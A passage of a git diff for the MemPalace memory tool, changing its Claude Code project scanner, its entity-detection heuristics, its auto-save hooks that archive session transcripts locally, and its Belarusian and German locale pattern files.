+                line = line.strip()
+                if not line:
+                    continue
+                try:
+                    obj = json.loads(line)
+                except json.JSONDecodeError:
+                    continue
+                cwd = obj.get("cwd")
+                if isinstance(cwd, str) and cwd:
+                    return cwd
+    except OSError:
+        return None
+    return None
+
+
+def _decode_slug_fallback(slug: str) -> str:
+    """Best-effort project name from slug when cwd is unavailable.
+
+    The slug is lossy (`/` and `-` both become `-`). Last non-empty segment
+    is the closest guess at the project name, preserving kebab-case is
+    impossible without cwd.
+    """
+    stripped = slug.lstrip("-")
+    parts = [p for p in stripped.split("-") if p]
+    return parts[-1] if parts else slug
+
+
+def _safe_mtime(path: Path) -> float:
+    """Return file mtime, defaulting old on permission or filesystem errors."""
+    try:
+        return path.stat().st_mtime
+    except OSError:
+        return 0.0
+
+
+def _resolve_project_name(project_dir: Path) -> str:
+    """Read one session's cwd to recover the original project name.
+
+    Falls back to slug-decoding if no session has a readable cwd.
+    """
+    sessions = sorted(
+        (p for p in project_dir.iterdir() if p.is_file() and p.suffix == ".jsonl"),
+        key=_safe_mtime,
+        reverse=True,  # newest first — most likely to be well-formed
+    )
+    for session in sessions:
+        cwd = _extract_cwd_from_session(session)
+        if cwd:
+            return Path(cwd).name or cwd
+    return _decode_slug_fallback(project_dir.name)
+
+
+def scan_claude_projects(path: str | Path) -> list[ProjectInfo]:
+    """Scan a ``.claude/projects/`` directory for Claude Code conversations.
+
+    One ProjectInfo per subdir. ``has_git`` is False (the directory isn't a
+    repo itself) but ``total_commits`` is repurposed here as session count so
+    the UX surfaces a density signal for ranking.
+    """
+    root = Path(path).expanduser().resolve()
+    if not is_claude_projects_root(root):
+        return []
+
+    projects: dict[str, ProjectInfo] = {}
+    for sub in sorted(root.iterdir()):
+        if not (sub.is_dir() and sub.name.startswith("-")):
+            continue
+        try:
+            sessions = [p for p in sub.iterdir() if p.is_file() and p.suffix == ".jsonl"]
+        except OSError:
+            continue
+        if not sessions:
+            continue
+
+        name = _resolve_project_name(sub)
+        session_count = len(sessions)
+
+        proj = ProjectInfo(
+            name=name,
+            repo_root=sub,
+            manifest=None,
+            has_git=False,
+            total_commits=session_count,
+            user_commits=session_count,
+            is_mine=True,  # Claude Code sessions are authored by the user
+        )
+        existing = projects.get(name)
+        if existing is None or session_count > existing.user_commits:
+            projects[name] = proj
+
+    return sorted(
+        projects.values(),
+        key=lambda p: (-p.user_commits, p.name),
+    )
diff --git a/mempalace/entity_detector.py b/mempalace/entity_detector.py
index 754c65dce..2f2aae481 100644
--- a/mempalace/entity_detector.py
+++ b/mempalace/entity_detector.py
@@ -113,6 +113,23 @@ def _get_stopwords(languages: tuple) -> frozenset:
     ".next",
     "coverage",
     ".mempalace",
+    ".terraform",
+    "vendor",
+    "target",
+}
+
+# Files whose content is boilerplate prose — poisons entity detection.
+# Matched by stem (case-insensitive), with or without an extension.
+SKIP_FILENAMES = {
+    "license",
+    "licence",
+    "copying",
+    "copyright",
+    "notice",
+    "authors",
+    "patents",
+    "third_party_notices",
+    "third-party-notices",
 }
 
 
@@ -193,7 +210,7 @@ def _compile_each(raw_patterns, flags=re.IGNORECASE):
         "person_verbs": _compile_each(sources["person_verb_patterns"]),
         "project_verbs": _compile_each(sources["project_verb_patterns"]),
         "direct": direct_compiled,
-        "versioned": re.compile(rf"\b{n}[-v]\w+", re.IGNORECASE),
+        "versioned": re.compile(rf"\b{n}[-_]v?\d+(?:\.\d+)*\b", re.IGNORECASE),
         "code_ref": re.compile(rf"\b{n}\.(py|js|ts|yaml|yml|json|sh)\b", re.IGNORECASE),
     }
 
@@ -227,12 +244,19 @@ def score_entity(name: str, text: str, lines: list, languages=("en",)) -> dict:
 
     # --- Person signals ---
 
-    # Dialogue markers (strong signal)
+    # Dialogue markers (strong signal).
+    # The bare `^NAME:\s` colon-prefix pattern matches metadata lines like
+    # `Created: 2026-04-21`, so we require >= 2 hits for it to count as dialogue
+    # (real speaker markers repeat; single-line metadata doesn't).
     for rx in patterns["dialogue"]:
         matches = len(rx.findall(text))
-        if matches > 0:
-            person_score += matches * 3
-            person_signals.append(f"dialogue marker ({matches}x)")
+        if matches == 0:
+            continue
+        is_bare_colon = rx.pattern.endswith(r":\s") and not rx.pattern.endswith(r"[:\s]")
+        if is_bare_colon and matches < 2:
+            continue
+        person_score += matches * 3
+        person_signals.append(f"dialogue marker ({matches}x)")
 
     # Person verbs
     for rx in patterns["person_verbs"]:
@@ -328,17 +352,28 @@ def classify_entity(name: str, frequency: int, scores: dict) -> dict:
             signal_categories.add("addressed")
 
     has_two_signal_types = len(signal_categories) >= 2
-    _ = signal_categories - {"pronoun"}  # reserved for future thresholds
+    # Single-category pronoun signal still classifies as person when the
+    # evidence is overwhelming — a diary's main character is referenced
+    # with pronouns, not dialogue markers. Require both: many pronoun hits
+    # AND a high pronoun-to-frequency ratio so common sentence-start words
+    # (Never, Before, etc.) with incidental pronoun proximity don't qualify.
+    pronoun_hits = 0
+    for s in scores["person_signals"]:
+        m = re.search(r"pronoun nearby \((\d+)x\)", s)
+        if m:
+            pronoun_hits = int(m.group(1))
+            break
+    strong_pronoun_signal = pronoun_hits >= 5 and frequency > 0 and pronoun_hits / frequency >= 0.2
 
-    if person_ratio >= 0.7 and has_two_signal_types and ps >= 5:
+    if person_ratio >= 0.7 and (has_two_signal_types and ps >= 5 or strong_pronoun_signal):
         entity_type = "person"
         confidence = min(0.99, 0.5 + person_ratio * 0.5)
         signals = scores["person_signals"] or [f"appears {frequency}x"]
-    elif person_ratio >= 0.7 and (not has_two_signal_types or ps < 5):
-        # Pronoun-only match — downgrade to uncertain
+    elif person_ratio >= 0.7:
+        # Weak single-category person signal — downgrade to uncertain
         entity_type = "uncertain"
         confidence = 0.4
-        signals = scores["person_signals"] + [f"appears {frequency}x — pronoun-only match"]
+        signals = scores["person_signals"] + [f"appears {frequency}x — weak person signal"]
     elif person_ratio <= 0.3:
         entity_type = "project"
         confidence = min(0.99, 0.5 + (1 - person_ratio) * 0.5)
@@ -560,6 +595,8 @@ def scan_for_detection(project_dir: str, max_files: int = 10) -> list:
         dirs[:] = [d for d in dirs if d not in SKIP_DIRS]
         for filename in filenames:
             filepath = Path(root) / filename
+            if filepath.stem.lower() in SKIP_FILENAMES:
+                continue
             ext = filepath.suffix.lower()
             if ext in PROSE_EXTENSIONS:
                 prose_files.append(filepath)
diff --git a/mempalace/hooks_cli.py b/mempalace/hooks_cli.py
index 92184f552..01eca3fb4 100644
--- a/mempalace/hooks_cli.py
+++ b/mempalace/hooks_cli.py
@@ -17,22 +17,54 @@
 SAVE_INTERVAL = 15
 STATE_DIR = Path.home() / ".mempalace" / "hook_state"
 
+
+def _mempalace_python() -> str:
+    """Return the python interpreter that has mempalace installed.
+
+    When hooks are invoked by Claude Code, sys.executable may be the system
+    python which lacks chromadb and other deps.  Resolution order:
+    1. MEMPALACE_PYTHON env var (explicit override)
+    2. Venv python from package install path
+    3. Editable install: venv/ sibling to mempalace/
+    4. sys.executable fallback
+    """
+    # Honor explicit override (used by shell hook wrappers)
+    env_python = os.environ.get("MEMPALACE_PYTHON", "")
+    if env_python and os.path.isfile(env_python) and os.access(env_python, os.X_OK):
+        return env_python
+    # This file lives at <venv>/lib/pythonX.Y/site-packages/mempalace/hooks_cli.py
+    # or <project>/mempalace/hooks_cli.py (editable install).
+    venv_bin = Path(__file__).resolve().parents[3] / "bin" / "python"
+    if venv_bin.is_file():
+        return str(venv_bin)
+    # Editable install: assumes project root has a venv/ sibling to mempalace/
+    project_venv = Path(__file__).resolve().parents[1] / "venv" / "bin" / "python"
+    if project_venv.is_file():
+        return str(project_venv)
+    return sys.executable
+
+
+_RECENT_MSG_COUNT = 30  # how many recent user messages to summarize
+
 STOP_BLOCK_REASON = (
     "AUTO-SAVE checkpoint (MemPalace). Save this session's key content:\n"
-    "1. mempalace_diary_write — AAAK-compressed session summary\n"
-    "2. mempalace_add_drawer — verbatim quotes, decisions, code snippets\n"
+    "1. mempalace_diary_write — session summary (what was discussed, "
+    "key decisions, current state of work)\n"
+    "2. mempalace_add_drawer — verbatim quotes, decisions, code snippets "
+    "(place in appropriate wing and room)\n"
     "3. mempalace_kg_add — entity relationships (optional)\n"
-    "Do NOT write to Claude Code's native auto-memory (.md files). "
-    "Continue conversation after saving."
+    "For THIS save, use MemPalace MCP tools only (not auto-memory .md files). "
+    "Use verbatim quotes where possible. Continue conversation after saving."
 )
 
 PRECOMPACT_BLOCK_REASON = (
     "COMPACTION IMMINENT (MemPalace). Save ALL session content before context is lost:\n"
-    "1. mempalace_diary_write — thorough AAAK-compressed session summary\n"
-    "2. mempalace_add_drawer — ALL verbatim quotes, decisions, code, context\n"
+    "1. mempalace_diary_write — thorough session summary\n"
+    "2. mempalace_add_drawer — ALL verbatim quotes, decisions, code, context "
+    "(place each in appropriate wing and room)\n"
     "3. mempalace_kg_add — entity relationships (optional)\n"
-    "Be thorough \u2014 after compaction, detailed context will be lost. "
-    "Do NOT write to Claude Code's native auto-memory (.md files). "
+    "For THIS save, use MemPalace MCP tools only (not auto-memory .md files). "
+    "Be thorough — after compaction this is all that survives. "
     "Save everything to MemPalace, then allow compaction to proceed."
 )
 
@@ -134,8 +166,35 @@ def _log(message: str):
 
 
 def _output(data: dict):
-    """Print JSON to stdout with consistent formatting (pretty-printed)."""
-    print(json.dumps(data, indent=2, ensure_ascii=False))
+    """Print JSON to stdout without importing modules that may redirect streams.
+
+    If mempalace.mcp_server is already loaded, reuse its saved real stdout fd.
+    Otherwise, write directly to fd 1 so hook responses still go to stdout even
+    if sys.stdout has been redirected elsewhere.
+    """
+    payload = (json.dumps(data, indent=2, ensure_ascii=False) + "\n").encode("utf-8")
+
+    real_stdout_fd: int | None = None
+    mcp_mod = sys.modules.get("mempalace.mcp_server") or sys.modules.get(
+        f"{__package__}.mcp_server" if __package__ else "mcp_server"
+    )
+    if mcp_mod is not None:
+        real_stdout_fd = getattr(mcp_mod, "_REAL_STDOUT_FD", None)
+
+    fd = real_stdout_fd if real_stdout_fd is not None else 1
+    offset = 0
+    try:
+        while offset < len(payload):
+            try:
+                offset += os.write(fd, payload[offset:])
+            except InterruptedError:
+                continue
+        return
+    except OSError:
+        pass
+
+    sys.stdout.buffer.write(payload)
+    sys.stdout.buffer.flush()
 
 
 def _get_mine_dir(transcript_path: str = "") -> str:
@@ -237,6 +296,182 @@ def _mine_sync(transcript_path: str = ""):
         pass
 
 
+def _desktop_toast(body: str, title: str = "MemPalace"):
+    """Send a desktop notification via notify-send. Fails silently."""
+    try:
+        subprocess.Popen(
+            ["notify-send", "--app-name=MemPalace", "--icon=brain", title, body],
+            stdout=subprocess.DEVNULL,
+            stderr=subprocess.DEVNULL,
+        )
+    except OSError:
+        pass
+
+
+def _extract_recent_messages(transcript_path: str, count: int = _RECENT_MSG_COUNT) -> list[str]:
+    """Extract the last N user messages from a JSONL transcript."""
+    path = Path(transcript_path).expanduser()
+    if not path.is_file():
+        return []
+    messages = []
+    try:
+        with open(path, encoding="utf-8", errors="replace") as f:
+            for line in f:
+                try:
+                    entry = json.loads(line)
+                    # Claude Code format
+                    msg = entry.get("message") or entry.get("event_message") or {}
+                    if isinstance(msg, dict) and msg.get("role") == "user":
+                        content = msg.get("content", "")
+                        if isinstance(content, list):
+                            content = " ".join(
+                                b.get("text", "") for b in content if isinstance(b, dict)
+                            )
+                        if not isinstance(content, str) or not content.strip():
+                            continue
+                        if "<command-message>" in content or "<system-reminder>" in content:
+                            continue
+                        messages.append(content.strip()[:200])
+                    # Codex CLI format
+                    elif entry.get("type") == "event_msg":
+                        payload = entry.get("payload", {})
+                        if isinstance(payload, dict) and payload.get("type") == "user_message":
+                            text = payload.get("message", "")
+                            if isinstance(text, str) and text.strip():
+                                if "<command-message>" not in text:
+                                    messages.append(text.strip()[:200])
+                except (json.JSONDecodeError, AttributeError):
+                    pass
+    except OSError:
+        return []
+    return messages[-count:]
+
+
+_THEME_STOPWORDS = frozenset(
+    "the a an and or but in on at to for of is it i me my you your we our "
+    "this that with from by was were be been are not no yes can do did dont "
+    "will would should could have has had lets let just also like so if then "
+    "ok okay sure yeah hey hi here there what when where how why which some "
+    "all any each every about into out up down over after before between "
+    "get got make made need want use used using check look see run try "
+    "know think right now still already really very much more most too "
+    "file files code one two new first last next thing things way well".split()
+)
+
+
+def _extract_themes(messages: list[str], max_themes: int = 3) -> list[str]:
+    """Pull 2-3 distinctive topic words from recent messages.
+
+    Note: stopword list is English-only; non-English corpora will produce noisy themes.
+    """
+    from collections import Counter
+
+    words: Counter[str] = Counter()
+    for msg in messages:
+        for word in msg.lower().split():
+            # Strip punctuation, keep words 4+ chars
+            clean = word.strip(".,;:!?\"'`()[]{}#<>/\\-_=+@$%^&*~")
+            if len(clean) >= 4 and clean not in _THEME_STOPWORDS and clean.isalpha():
+                words[clean] += 1
+    return [w for w, _ in words.most_common(max_themes)]
+
+
+def _save_diary_direct(
+    transcript_path: str,
+    session_id: str,
+    wing: str = "",
+    toast: bool = False,
+) -> dict:
+    """Write a diary checkpoint by calling the tool function directly (no MCP roundtrip).
+
+    If `wing` is set, the entry lands in that wing (typically the project wing
+    derived from the transcript path). Otherwise falls back to `tool_diary_write`'s
+    default of `wing_session-hook`.
+
+    Returns {"count": N, "themes": [...]} on success, {"count": 0} on failure.
+    """
+    messages = _extract_recent_messages(transcript_path)
+    if not messages:
+        _log("No recent messages to save")
+        return {"count": 0}
+
+    themes = _extract_themes(messages)
+
+    # Build a compressed diary entry from recent conversation
+    now = datetime.now()
+    topics = "|".join(m[:80] for m in messages[-10:])
+    entry = (
+        f"CHECKPOINT:{now.strftime('%Y-%m-%d')}|session:{session_id}"
+        f"|msgs:{len(messages)}|recent:{topics}"
+    )
+
+    try:
+        from .mcp_server import tool_diary_write
+
+        result = tool_diary_write(
+            agent_name="session-hook",
+            entry=entry,
+            topic="checkpoint",
+            wing=wing,
+        )
+        if result.get("success"):
+            _log(f"Diary checkpoint saved: {result.get('entry_id', '?')}")
+            # Write state for ack tool to read
+            try:
+                ack_file = STATE_DIR / "last_checkpoint"
+                ack_file.write_text(
+                    json.dumps({"msgs": len(messages), "ts": now.isoformat()}),
+                    encoding="utf-8",
+                )
+            except OSError:
+                pass
+            if toast:
+                _desktop_toast(f"Checkpoint saved \u2014 {len(messages)} messages archived")
+            return {"count": len(messages), "themes": themes}
+        else:
+            _log(f"Diary checkpoint failed: {result.get('error', 'unknown')}")
+    except Exception as e:
+        _log(f"Diary checkpoint error: {e}")
+    return {"count": 0}
+
+
+def _ingest_transcript(transcript_path: str):
+    """Mine a Claude Code session transcript into the palace as a conversation."""
+    path = Path(transcript_path).expanduser()
+    if not path.is_file() or path.stat().st_size < 100:
+        return
+
+    from .config import MempalaceConfig
+
+    try:
+        MempalaceConfig()  # validate config loads
+    except Exception:
+        return
+
+    try:
+        log_path = STATE_DIR / "hook.log"
+        STATE_DIR.mkdir(parents=True, exist_ok=True)
+        with open(log_path, "a") as log_f:
+            subprocess.Popen(
+                [
+                    _mempalace_python(),
+                    "-m",
+                    "mempalace",
+                    "mine",
+                    str(path.parent),
+                    "--mode",
+                    "convos",
+                    "--wing",
+                    "sessions",
+                ],
+                stdout=log_f,
+                stderr=log_f,
+            )
+        _log(f"Transcript ingest started: {path.name}")
+    except OSError:
+        pass
+
+
 SUPPORTED_HARNESSES = {"claude-code", "codex"}
 
 
@@ -252,6 +487,39 @@ def _parse_harness_input(data: dict, harness: str) -> dict:
     }
 
 
+def _wing_from_transcript_path(transcript_path: str) -> str:
+    """Derive a project wing name from a Claude Code transcript path.
+
+    Claude Code encodes the project's source directory by replacing path
+    separators with dashes, producing folders like:
+        ~/.claude/projects/-home-<user>-Projects-<project>/session.jsonl
+        ~/.claude/projects/-home-<user>-dev-<parent>-<project>/session.jsonl
+        ~/.claude/projects/-Users-<user>-<folder>-<project>/session.jsonl
+
+    The project directory name is the final dash-separated token of the
+    encoded folder. Returns ``wing_<project>`` (lowercased, spaces → ``_``).
+    Falls back to ``wing_sessions`` if the path does not match a Claude Code
+    project-folder layout.
+    """
+    # Normalize path separators for cross-platform (Windows backslashes)
+    normalized = transcript_path.replace("\\", "/")
+    # Primary: pull the encoded project folder out of ``.claude/projects/``
+    # and take its last dash-separated token.
+    match = re.search(r"/\.claude/projects/-([^/]+)", normalized)
+    if match:
+        encoded = match.group(1)
+        project = encoded.rsplit("-", 1)[-1]
+        if project:
+            return f"wing_{project.lower().replace(' ', '_')}"
+    # Legacy fallback: explicit ``-Projects-<name>`` segment, useful for
+    # transcripts not under the standard Claude Code projects dir.
+    match = re.search(r"-Projects-([^/]+?)(?:/|$)", normalized)
+    if match:
+        project = match.group(1).lower().replace(" ", "_")
+        return f"wing_{project}"
+    return "wing_sessions"
+
+
 def hook_stop(data: dict, harness: str):
     """Stop hook: block every N messages for auto-save."""
     parsed = _parse_harness_input(data, harness)
@@ -259,10 +527,29 @@ def hook_stop(data: dict, harness: str):
     stop_hook_active = parsed["stop_hook_active"]
     transcript_path = parsed["transcript_path"]
 
-    # If already in a save cycle, let through (infinite-loop prevention)
+    # If already in a block-mode save cycle, let through (infinite-loop prevention).
+    # Silent mode saves directly without returning {"decision":"block"}, so there's
+    # no loop to prevent — and Claude Code's plugin dispatch sets this flag on every
+    # fire after the first, which would otherwise suppress all subsequent auto-saves.
     if str(stop_hook_active).lower() in ("true", "1", "yes"):
-        _output({})
-        return
+        # Safe default: assume silent mode on any config-read failure so saves
+        # proceed rather than being silently dropped. Silent mode is the default
+        # (v3.3.0+), so if we can't read config, behave as if it's still on.
+        silent_guard = True
+        try:
+            from .config import MempalaceConfig
+        except ImportError as exc:
+            _log(
+                f"WARNING: could not import MempalaceConfig for stop guard: {exc}; defaulting to silent mode"
+            )
+        else:
+            try:
+                silent_guard = MempalaceConfig().hook_silent_save
+            except AttributeError as exc:
+                _log(f"WARNING: could not read hook_silent_save: {exc}; defaulting to silent mode")
+        if not silent_guard:
+            _output({})
+            return
 
     # Count human messages
     exchange_count = _count_human_messages(transcript_path)
@@ -282,18 +569,62 @@ def hook_stop(data: dict, harness: str):
     _log(f"Session {session_id}: {exchange_count} exchanges, {since_last} since last save")
 
     if since_last >= SAVE_INTERVAL and exchange_count > 0:
-        # Update last save point
-        try:
-            last_save_file.write_text(str(exchange_count), encoding="utf-8")
-        except OSError:
-            pass
-
         _log(f"TRIGGERING SAVE at exchange {exchange_count}")
 
-        # Optional: auto-ingest if MEMPAL_DIR is set
-        _maybe_auto_ingest(transcript_path)
+        # Read hook settings from config
+        from .config import MempalaceConfig
 
-        _output({"decision": "block", "reason": STOP_BLOCK_REASON})
+        try:
+            config = MempalaceConfig()
+            silent = config.hook_silent_save
+            toast = config.hook_desktop_toast
+        except Exception:
+            silent = True
+            toast = False
+
+        project_wing = _wing_from_transcript_path(transcript_path)
+
+        if silent:
+            # Save directly via Python API — systemMessage renders in terminal
+            result = {"count": 0}
+            if transcript_path:
+                result = _save_diary_direct(
+                    transcript_path, session_id, wing=project_wing, toast=toast
+                )
+                _ingest_transcript(transcript_path)
+            _maybe_auto_ingest(transcript_path)
+            # Only advance save marker after successful save
+            count = result.get("count", 0)
+            if count > 0:
+                try:
+                    last_save_file.write_text(str(exchange_count), encoding="utf-8")
+                except OSError:
+                    pass
+                themes = result.get("themes", [])
+                if themes:
+                    tag = " \u2014 " + ", ".join(themes)
+                else:
+                    tag = ""
+                _output(
+                    {
+                        "systemMessage": f"\u2726 {count} memories woven into the palace{tag}",
+                    }
+                )
+            else:
+                _output({})
+        else:
+            # Legacy: block and ask Claude to save via MCP tools.
+            # Marker advances before confirmed save — best-effort; if Claude
+            # fails to save, the checkpoint is lost but won't retry endlessly.
+            try:
+                last_save_file.write_text(str(exchange_count), encoding="utf-8")
+            except OSError:
+                pass
+            if transcript_path:
+                _ingest_transcript(transcript_path)
+            _maybe_auto_ingest(transcript_path)
+            reason = STOP_BLOCK_REASON + f" Write diary entry to wing={project_wing}."
+            _output({"decision": "block", "reason": reason})
     else:
         _output({})
 
@@ -320,6 +651,10 @@ def hook_precompact(data: dict, harness: str):
 
     _log(f"PRE-COMPACT triggered for session {session_id}")
 
+    # Capture tool output via our normalize path before compaction loses it
+    if transcript_path:
+        _ingest_transcript(transcript_path)
+
     # Mine synchronously so data lands before compaction proceeds
     _mine_sync(transcript_path)
 
diff --git a/mempalace/i18n/be.json b/mempalace/i18n/be.json
new file mode 100644
index 000000000..01e808e85
--- /dev/null
+++ b/mempalace/i18n/be.json
@@ -0,0 +1,166 @@
+{
+  "lang": "be",
+  "label": "Беларуская",
+  "terms": {
+    "palace": "палац",
+    "wing": "крыло",
+    "hall": "зала",
+    "closet": "шафа",
+    "drawer": "шуфляда",
+    "mine": "майнінг",
+    "search": "пошук",
+    "status": "статус",
+    "init": "ініцыялізацыя",
+    "repair": "аднаўленне",
+    "migrate": "міграцыя",
+    "entity": "аб'ект",
+    "topic": "тэма"
+  },
+  "cli": {
+    "mine_start": "Майнінг {path}...",
+    "mine_complete": "Гатова. Створана шаф: {closets}, шуфляд: {drawers}.",
+    "mine_skip": "Майнінг скончаны. Выкарыстайце --force, каб перамайніць.",
+    "search_no_results": "Няма вынікаў для: {query}",
+    "search_results": "Знойдзена {count} вынікаў:",
+    "status_palace": "Палац: {path}",
+    "status_wings": "Крылаў: {count}",
+    "status_closets": "Шаф: {count}",
+    "status_drawers": "Шуфляд: {count}",
+    "init_complete": "Палац ініцыялізаваны ў {path}",
+    "init_exists": "Палац ужо існуе ў {path}",
+    "repair_complete": "Аднаўленне скончана. Выпраўлена праблем: {fixed}.",
+    "migrate_complete": "Міграцыя завершана.",
+    "no_palace": "Палац не знойдзены. Запусціце: mempalace init <дырэкторыя>"
+  },
+  "aaak": {
+    "instruction": "Сцісні да фармату індэкса. Злучкі паміж словамі, вертыкальныя рысы паміж паняткамі. Выдалі падставы і службовыя словы. Захавай дакладнасць імёнаў, нумароў, скланенняў і формаў."
+  },
+  "regex": {
+    "topic_pattern": "[А-ЯЁІЎ][а-яёіў]{2,}|[A-Z][a-z]{2,}|[A-Za-z][A-Za-z0-9_]{2,}",
+    "stop_words": "і а але бо каб калі калісьці хоць што хто дзе куды адкуль як чаму таму ж не ні так таксама яшчэ ўжо цяпер потым тут там адсюль туды ў на па з са без для над пад пры пра праз супраць замест акрамя сярод вакол уздоўж каля паміж пасля перад да ад у або альбо то ці быццам нібыта вось гэты гэта гэтыя той тая тыя некаторыя кожны кожная кожныя толькі вельмі можа трэба будзе быў была былі ёсць няма",
+    "quote_pattern": "«\\s*([^»]{10,200})\\s*»|\"([^\"]{10,200})\"",
+    "action_pattern": "(?:зрабіў|зрабіла|зрабілі|стварыў|стварыла|стварылі|дадаў|дадала|дадалі|абнавіў|абнавіла|абнавілі|наладзіў|наладзіла|наладзілі|пратэставаў|пратэставала|пратэставалі)\\s+[\\wа-яёА-ЯЁІіЎў\\s]{3,30}"
+  },
+  "entity": {
+    "candidate_pattern": "[А-ЯЁІЎ][а-яёіў]{1,19}",
+    "multi_word_pattern": "[А-ЯЁІЎ][а-яёіў]+(?:\\s+[А-ЯЁІЎ][а-яёіў]+)+",
+    "person_verb_patterns": [
+      "\\b{name}\\s+сказа(?:ў|ла|лі)\\b",
+      "\\b{name}\\s+спыта(?:ў|ла|лі)\\b",
+      "\\b{name}\\s+адказа(?:ў|ла|лі)\\b",
+      "\\b{name}\\s+расказа(?:ў|ла|лі)\\b",
+      "\\b{name}\\s+засмея(?:ўся|лася|ліся)\\b",
+      "\\b{name}\\s+усміхну(?:ўся|лася|ліся)\\b",
+      "\\b{name}\\s+заплака(?:ў|ла|лі)\\b",
+      "\\b{name}\\s+адчу(?:ў|ла|лі)\\b",
+      "\\b{name}\\s+думае\\b",
+      "\\b{name}\\s+хоча\\b",
+      "\\b{name}\\s+кахае\\b",
+      "\\b{name}\\s+ненавідзіць\\b",
+      "\\b{name}\\s+ведае\\b",
+      "\\b{name}\\s+вырашы(?:ў|ла|лі)\\b",
+      "\\b{name}\\s+напіса(?:ў|ла|лі)\\b",
+      "\\b{name}\\s+каза(?:ў|ла|лі)\\b",
+      "\\b{name}\\s+зрабі(?:ў|ла|лі)\\b",
+      "\\b{name}\\s+спытваецца\\b",
+      "\\b{name}\\s+адказвае\\b"
+    ],
+    "pronoun_patterns": [
+      "\\bён\\b",
+      "\\bяго\\b",
+      "\\bяму\\b",
+      "\\bім\\b",
+      "\\bяна\\b",
+      "\\bяе\\b",
+      "\\bёй\\b",
+      "\\bёю\\b",
+      "\\bяны\\b",
+      "\\bіх\\b",
+      "\\bімі\\b",
+      "\\bяно\\b",
+      "\\bвы\\b",
+      "\\bвас\\b",
+      "\\bвам\\b",
+      "\\bвамі\\b"
+    ],
+    "dialogue_patterns": [
+      "^>\\s*{name}[:\\s]",
+      "^{name}:\\s",
+      "^\\[{name}\\]",
+      "\"{name}\\s+сказа(?:ў|ла|лі)"
+    ],
+    "direct_address_pattern": "\\bпрывітанне[,:!.]?\\s+{name}\\b|\\bвітаю[,:!.]?\\s+{name}\\b|\\bдзякуй[,:!.]?\\s+{name}\\b|\\bдарагі[,:!.]?\\s+{name}\\b|\\bдарагая[,:!.]?\\s+{name}\\b|\\bпаважаны[,:!.]?\\s+{name}\\b|\\bпаважаная[,:!.]?\\s+{name}\\b",
+    "project_verb_patterns": [
+      "\\bзбіраю\\s+{name}\\b",
+      "\\bсабраў\\s+{name}\\b",
+      "\\bзапускаю\\s+{name}\\b",
+      "\\bзапусціў\\s+{name}\\b",
+      "\\bразгарнуў\\s+{name}\\b",
+      "\\bусталяваў\\s+{name}\\b",
+      "\\bсістэма\\s+{name}\\b",
+      "\\bпраект\\s+{name}\\b",
+      "\\bimport\\s+{name}\\b",
+      "\\bpip\\s+install\\s+{name}\\b"
+    ],
+    "stopwords": [
+      "і",
+      "ў",
+      "з",
+      "са",
+      "на",
+      "па",
+      "да",
+      "ад",
+      "у",
+      "без",
+      "для",
+      "над",
+      "пад",
+      "пры",
+      "пра",
+      "праз",
+      "супраць",
+      "замест",
+      "акрамя",
+      "сярод",
+      "вакол",
+      "уздоўж",
+      "каля",
+      "паміж",
+      "пасля",
+      "перад",
+      "або",
+      "альбо",
+      "каб",
+      "калі",
+      "хоць",
+      "бо",
+      "ж",
+      "не",
+      "ні",
+      "так",
+      "яшчэ",
+      "ужо",
+      "цяпер",
+      "вось",
+      "гэта",
+      "тое",
+      "тут",
+      "там",
+      "вельмі",
+      "толькі",
+      "можа",
+      "трэба",
+      "ёсць",
+      "няма",
+      "як",
+      "што",
+      "хто",
+      "чаму",
+      "таму",
+      "прывітанне",
+      "дзякуй",
+      "ласка"
+    ]
+  }
+}
diff --git a/mempalace/i18n/de.json b/mempalace/i18n/de.json
index c6677b37d..f2476e119 100644
--- a/mempalace/i18n/de.json
+++ b/mempalace/i18n/de.json
@@ -40,5 +40,87 @@
     "stop_words": "der die das ein eine eines einer einem einen den dem des und oder aber denn weil wenn als ob auch noch schon sehr viel nur nicht mehr kann wird hat ist sind war waren sein haben wurde mit von zu für auf in an um über nach durch",
     "quote_pattern": "\\u201E([^\\u201C]{10,200})\\u201C|\"([^\"]{10,200})\"",
     "action_pattern": "(?:gebaut|behoben|geschrieben|hinzugefügt|gepusht|gemessen|getestet|überprüft|erstellt|gelöscht|aktualisiert|konfiguriert|bereitgestellt|migriert)\\s+[\\wÄÖÜäöüß\\s]{3,30}"
+  },
+  "entity": {
+    "candidate_pattern": "[A-ZÄÖÜ][a-zäöüß]{1,19}",
+    "multi_word_pattern": "[A-ZÄÖÜ][a-zäöüß]+(?:\\s+[A-ZÄÖÜ][a-zäöüß]+)+",
+    "person_verb_patterns": [
+      "\\b{name}\\s+sagte\\b",
+      "\\b{name}\\s+fragte\\b",
+      "\\b{name}\\s+antwortete\\b",
+      "\\b{name}\\s+erzählte\\b",
+      "\\b{name}\\s+lachte\\b",
+      "\\b{name}\\s+lächelte\\b",
+      "\\b{name}\\s+weinte\\b",
+      "\\b{name}\\s+fühlte\\b",
+      "\\b{name}\\s+denkt\\b",
+      "\\b{name}\\s+will\\b",
+      "\\b{name}\\s+liebt\\b",
+      "\\b{name}\\s+hasst\\b",
+      "\\b{name}\\s+weiß\\b",
+      "\\b{name}\\s+entschied\\b",
+      "\\b{name}\\s+schrieb\\b"
+    ],
+    "pronoun_patterns": [
+      "\\ber\\b",
+      "\\bsie\\b",
+      "\\bes\\b",
+      "\\bihn\\b",
+      "\\bihm\\b",
+      "\\bihr\\b",
+      "\\bsein\\b",
+      "\\bihre\\b",
+      "\\bihnen\\b"
+    ],
+    "dialogue_patterns": [
+      "^>\\s*{name}[:\\s]",
+      "^{name}:\\s",
+      "^\\[{name}\\]",
+      "\"{name}\\s+sagte"
+    ],
+    "direct_address_pattern": "\\bhallo\\s+{name}\\b|\\bhi\\s+{name}\\b|\\bhey\\s+{name}\\b|\\bdanke\\s+{name}\\b|\\bservus\\s+{name}\\b|\\blieber\\s+{name}\\b|\\bliebe\\s+{name}\\b|\\bsehr\\s+geehrter\\s+{name}\\b|\\bsehr\\s+geehrte\\s+{name}\\b",
+    "project_verb_patterns": [
+      "\\bbaue\\s+{name}\\b",
+      "\\bgebaut\\s+{name}\\b",
+      "\\bstarte\\s+{name}\\b",
+      "\\bgestartet\\s+{name}\\b",
+      "\\bdeploye\\s+{name}\\b",
+      "\\binstalliert\\s+{name}\\b",
+      "\\bdie\\s+{name}\\s+architektur\\b",
+      "\\bdie\\s+{name}\\s+pipeline\\b",
+      "\\bdas\\s+{name}\\s+system\\b",
+      "\\bdas\\s+{name}\\s+repository\\b",
+      "\\b{name}\\s+v\\d+\\b",
+      "\\b{name}\\.py\\b",
+      "\\bimport\\s+{name}\\b",
